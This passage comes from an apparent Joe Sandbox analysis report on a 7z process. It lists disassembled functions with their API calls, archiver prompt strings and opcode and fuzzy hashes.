                                • DeviceIoControl.KERNEL32 ref: 00419EAE
                                  • Part of subcall function 0041BC48: GetModuleHandleW.KERNEL32 ref: 0041BC69
                                  • Part of subcall function 0041BC48: GetProcAddress.KERNEL32 ref: 0041BC79
                                  • Part of subcall function 0041BC48: GetDiskFreeSpaceW.KERNEL32 ref: 0041BCCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                • String ID: ($:
                                • API String ID: 4250411929-4277925470
                                • Opcode ID: ce002fe7effc5463a8c12060252067aaf69f96b6df7ad79dc4c52b9bfb511346
                                • Instruction ID: 6beee3d6e1a2185157358bd05a64f998152d438c9a662f053817bfa754e0e5fe
                                • Opcode Fuzzy Hash: ce002fe7effc5463a8c12060252067aaf69f96b6df7ad79dc4c52b9bfb511346
                                • Instruction Fuzzy Hash: 20517D33609BC095C721CF20F06079EB7A4F784758F58851AEB8A47B98EB3DC895CB48
                                Function 00460474 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 00460492
                                • fputs.MSVCRT ref: 004604F4
                                • fputs.MSVCRT ref: 00460520
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                • LeaveCriticalSection.KERNEL32 ref: 00460616
                                Strings
                                • with the file from archive:, xrefs: 00460516
                                • Would you like to replace the existing file:, xrefs: 004604ED
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$CriticalSection$EnterLeavememset
                                • String ID: Would you like to replace the existing file:$with the file from archive:
                                • API String ID: 892811258-686978020
                                • Opcode ID: 601b029b9ada97ad12c09c0e40608fd2099026188d1b8f87dacac4d9d52ce1f0
                                • Instruction ID: 6e5c862d3a108e76b0b3fd8ad71c82b1ccdc244c3eb3ea6cef493dcf4e9d2684
                                • Opcode Fuzzy Hash: 601b029b9ada97ad12c09c0e40608fd2099026188d1b8f87dacac4d9d52ce1f0
                                • Instruction Fuzzy Hash: 7E41A0B2314685A6EB19DF26D9503AB6321F794B84F4481239F0E47751EF3CC894CB0A
                                Function 0046D178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Enter password (will not be echoed):, xrefs: 0046D191
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ConsoleMode$Handlefflushfputs
                                • String ID: Enter password (will not be echoed):
                                • API String ID: 108775803-3720017889
                                • Opcode ID: 2a4e5efe55df4ec8f55cc8e5b7e692fd33b38d363443e79acfc80d1e455f2548
                                • Instruction ID: 4cb8e2d27307c72e98422c1a59d60a023db3adf3b12b469a39eda27e9bab0ca0
                                • Opcode Fuzzy Hash: 2a4e5efe55df4ec8f55cc8e5b7e692fd33b38d363443e79acfc80d1e455f2548
                                • Instruction Fuzzy Hash: DD210D61F0568183EE189B65AD5037A6350AB85BB4F184326DF1F877E0FF6CC885C309
                                Function 00460A98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CriticalSectionfputs$EnterLeavefree
                                • String ID: :
                                • API String ID: 1989314732-3653984579
                                • Opcode ID: 8ba75d28dd331cce65981d77e998c4092c08d57d4028349734a31fdcd73601a5
                                • Instruction ID: b4b29b629b534af47c0e72f76c5fc4f5d5e22999bd9d57ca123f7e5e9fa2881d
                                • Opcode Fuzzy Hash: 8ba75d28dd331cce65981d77e998c4092c08d57d4028349734a31fdcd73601a5
                                • Instruction Fuzzy Hash: E1312976204A8581DB119F25D4803EE2361FB94F9CF484137DE8E8B668DFBCC889C359
                                Function 00440FF4 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: crc32$crc64$md5$sha1$sha256
                                • API String ID: 1294909896-3826973078
                                • Opcode ID: 627808585f67796ce0ce0483dea4fd69f057094cedb4e7811970197654dcad54
                                • Instruction ID: 043f6aca9a295d193e7166c93db3661b4276bcb881e984d6808ee712ca8f6703
                                • Opcode Fuzzy Hash: 627808585f67796ce0ce0483dea4fd69f057094cedb4e7811970197654dcad54
                                • Instruction Fuzzy Hash: 2821FB7230468499EA30DF12E64039E6321D3857E4F548227DA5E47B65DF7CDAC6C308
                                Function 00461240 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputsfree
                                • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                                • API String ID: 2581285248-1259944392
                                • Opcode ID: b7d0c9e13f612dcd9a93b48e2bf9113342a65e5be0b76e18f2c2d7fa1630b9af
                                • Instruction ID: 5f12af013c31d002f92eec7f85182ce637858c13440e76f6108b00106acf947a
                                • Opcode Fuzzy Hash: b7d0c9e13f612dcd9a93b48e2bf9113342a65e5be0b76e18f2c2d7fa1630b9af
                                • Instruction Fuzzy Hash: D42195B2304A4595CF24EB17E85039A6721E789BECF480227AF4E87775EF6CC595C704
                                Function 0046E6F0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 16libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                • API String ID: 667068680-4044117955
                                • Opcode ID: dd25da05bc82ba6021c17f9e44052074488abcd980775d277f0d9dc0a26f7085
                                • Instruction ID: 4871cd20d9800b711f5a5003285b4a5d70b73019dfdc9ac001d7e3d547414c14
                                • Opcode Fuzzy Hash: dd25da05bc82ba6021c17f9e44052074488abcd980775d277f0d9dc0a26f7085
                                • Instruction Fuzzy Hash: 8BE046E8616B0AC1EF408BD2FC8831023A0F308794F8010A1CA0D43330EF3C8699C308
                                Function 004561FC Relevance: 10.2, APIs: 8, Instructions: 195COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 01a6a2b08de4f07bd8a7e960d8ce1f279f191e836e97f789a585fd570255e9d4
                                • Instruction ID: 75a9ba0a4e762691e94221d2b7aa77a15c89c44b90b94b13807eaec9c85b0cea
                                • Opcode Fuzzy Hash: 01a6a2b08de4f07bd8a7e960d8ce1f279f191e836e97f789a585fd570255e9d4
                                • Instruction Fuzzy Hash: ED6107332086D096CB31DB26E44129FB720F7C6B94F954117EF9A47B1ACA7CC58ACB58
                                Function 00421CE0 Relevance: 10.2, APIs: 8, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 952ed7c5f00870a6d072419502f70e493fa4ab4cb7f3740f3dbfcaea093a6856
                                • Instruction ID: ec7a19b39be492284fee7cfa56ea5d0cc1ff50f8ab28ed09893d760c95a1a057
                                • Opcode Fuzzy Hash: 952ed7c5f00870a6d072419502f70e493fa4ab4cb7f3740f3dbfcaea093a6856
                                • Instruction Fuzzy Hash: 55713C72305B4486CB14DF2AE55036D67A0FB89B94F54422AEB6E87B64CF3DD862CB04
                                Function 004264E8 Relevance: 10.1, APIs: 8, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: f9b73384b53ea654a700601d9f87f94090fd67aa3f7ff949fe032c8bbf510844
                                • Instruction ID: 4692b11ad228b1552a9577589f16764159f0e80fc9247a20fe0e1e9c2cee353b
                                • Opcode Fuzzy Hash: f9b73384b53ea654a700601d9f87f94090fd67aa3f7ff949fe032c8bbf510844
                                • Instruction Fuzzy Hash: 89412B3324A2C0D5CB11DF25F0502AEBB20E7D1798F84421BEB9947769DB6DC9DACB09
                                Function 00438D00 Relevance: 10.1, APIs: 8, Instructions: 90COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: freememmove$ExceptionThrowmalloc
                                • String ID:
                                • API String ID: 1818558235-0
                                • Opcode ID: 9fb808bbfa609137d1fdf85ecbcd6e1857a504d74eac7a4c1e6a3e0381ab0ad7
                                • Instruction ID: c176494443d47ae3ed20707f424687d1c54345aef82683a25d8e60925c9e921d
                                • Opcode Fuzzy Hash: 9fb808bbfa609137d1fdf85ecbcd6e1857a504d74eac7a4c1e6a3e0381ab0ad7
                                • Instruction Fuzzy Hash: 09315AB27016588B8B64DF3BD48245DB3A4E758FD8318512BEE2DDB708DE68DC92CB44
                                Function 0045D170 Relevance: 10.1, APIs: 8, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 1b8a1aa51232dedb969a71f5f3019cc1aacb03ae41857c4e251de1aaed421467
                                • Instruction ID: 6b155affe2811f0a11e53e27a3701a488a3ecd319dabe0c90659add70e859248
                                • Opcode Fuzzy Hash: 1b8a1aa51232dedb969a71f5f3019cc1aacb03ae41857c4e251de1aaed421467
                                • Instruction Fuzzy Hash: C4118632740B8997C614AA36EA502AD2310FB81BA4F4803369F3D5B751CF68C8758304
                                Function 0045198E Relevance: 10.0, APIs: 8, Instructions: 42COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: cf44059c6c32b5cb6a0f39292633820c0cbf2afead3bca816bedd606f8241d4f
                                • Instruction ID: 099aca6132e3e54ed484c6f3abc354d9196f1f4c296e07d982f3a97c23e77b67
                                • Opcode Fuzzy Hash: cf44059c6c32b5cb6a0f39292633820c0cbf2afead3bca816bedd606f8241d4f
                                • Instruction Fuzzy Hash: F6F031312C565E42CB10F733E55556E6710E7C2F85B441117EE5A97721CE6CC4A6860D
                                Function 004518E9 Relevance: 10.0, APIs: 8, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: fa36d317f4e258a045e58811932722eef90d09ce1aabdeaf0b4425d617853f98
                                • Instruction ID: 1228bd8c72b465c8895b5563aa6103725929dd70f82e2e77421cee21d7fd95a7
                                • Opcode Fuzzy Hash: fa36d317f4e258a045e58811932722eef90d09ce1aabdeaf0b4425d617853f98
                                • Instruction Fuzzy Hash: EBF04F312CA69D46CB10F733E5555AE6710EBC2F85B441127EE5E97722CE6CC4A6C20C
                                Function 00451C61 Relevance: 10.0, APIs: 8, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 021e2c5d6e07651c19eb1ab04e3ea46e36c024787ef77c11b8bc16346f8d79da
                                • Instruction ID: 18599cb7f3f9b7b3d6df2c84e8f75a1cd786a4a34b24f6d364031ddfb8af8c40
                                • Opcode Fuzzy Hash: 021e2c5d6e07651c19eb1ab04e3ea46e36c024787ef77c11b8bc16346f8d79da
                                • Instruction Fuzzy Hash: 19F04F322CA68D42CB10F733E5555AE6B10EBC6F85B441516EE6E97722CE6CC4B6820C
                                Function 00451A49 Relevance: 10.0, APIs: 8, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 9033fa371487fd137d000dc9ca7ebdd7d74c581a715bbfbf13cd9923f6b6f07d
                                • Instruction ID: 777cb1a787dd9e1d9e850d1360769a7239075037f971cf093adb8dccfd3e64bb
                                • Opcode Fuzzy Hash: 9033fa371487fd137d000dc9ca7ebdd7d74c581a715bbfbf13cd9923f6b6f07d
                                • Instruction Fuzzy Hash: 2EF04F3228A68D42CB10F733E5615AE6710E7C2F85B442117EE6E97722CE6CC4A6820C
                                Function 00451B04 Relevance: 10.0, APIs: 8, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: db5ba24876c63a59b12deff57d4e77219ce991600060bb8642b998b56719081c
                                • Instruction ID: 178e30912aa32611047a61e00777ee66d50124d256f406aa1db2fe07f9086a67
                                • Opcode Fuzzy Hash: db5ba24876c63a59b12deff57d4e77219ce991600060bb8642b998b56719081c
                                • Instruction Fuzzy Hash: 22F030312C564D82CB10FB33E1615AE5310EBC6F85B402117EE2F97722DE6CC4A7860C
                                Function 00451BB8 Relevance: 10.0, APIs: 8, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                                • Instruction ID: c0d60084a17261b8b9e25bfc80dc998b068c45f1c245e92f77751abebe3ef8db
                                • Opcode Fuzzy Hash: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                                • Instruction Fuzzy Hash: D2F0D0312C564D42CB14FB33E55156E5710EBC6F85B406517EE6E97722CE6CC4A7860C
                                Function 00451DC0 Relevance: 10.0, APIs: 8, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 70d84a3f943c915080db66fc4ef9005961add26d4c2fea13df9d6efc16db21ed
                                • Instruction ID: e7d4db19fb9bd8cb212f3b8af5c2db735a04ceb4e669a445626379c4ff78fdd7
                                • Opcode Fuzzy Hash: 70d84a3f943c915080db66fc4ef9005961add26d4c2fea13df9d6efc16db21ed
                                • Instruction Fuzzy Hash: 1DF0BD31285A4E42CB14FB33E15166E5710EBC2F89B402117EE6A97725CE6CC4A6860D
                                Function 00451E78 Relevance: 10.0, APIs: 8, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                                • Instruction ID: f18cc7a1f654f54450da9410a3f793cc0be3c8db2270a2544162cb5af638dca3
                                • Opcode Fuzzy Hash: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                                • Instruction Fuzzy Hash: EDF0D0312C564D42CB14FB33E55156E5710EBC6F85B402517EE6E97722CE6CC4A7860C
                                Function 0046B604 Relevance: 10.0, APIs: 8, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$fputsmemset
                                • String ID:
                                • API String ID: 469995913-0
                                • Opcode ID: 3d26b01c9de8f9ce5d4e083322491c96ecb96b900abf0e914f1e4e95d5619cf6
                                • Instruction ID: ea6d5a8fc78b0283f884f7b46332e660a8582aebc56638ddf5d84129bf179da3
                                • Opcode Fuzzy Hash: 3d26b01c9de8f9ce5d4e083322491c96ecb96b900abf0e914f1e4e95d5619cf6
                                • Instruction Fuzzy Hash: 6FF09C3229164D82C710FB32E5515AD2321E7C1B6CB445327AE7D9B2AACE6CC8A28348
                                Function 0043F078 Relevance: 9.2, APIs: 6, Instructions: 236COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
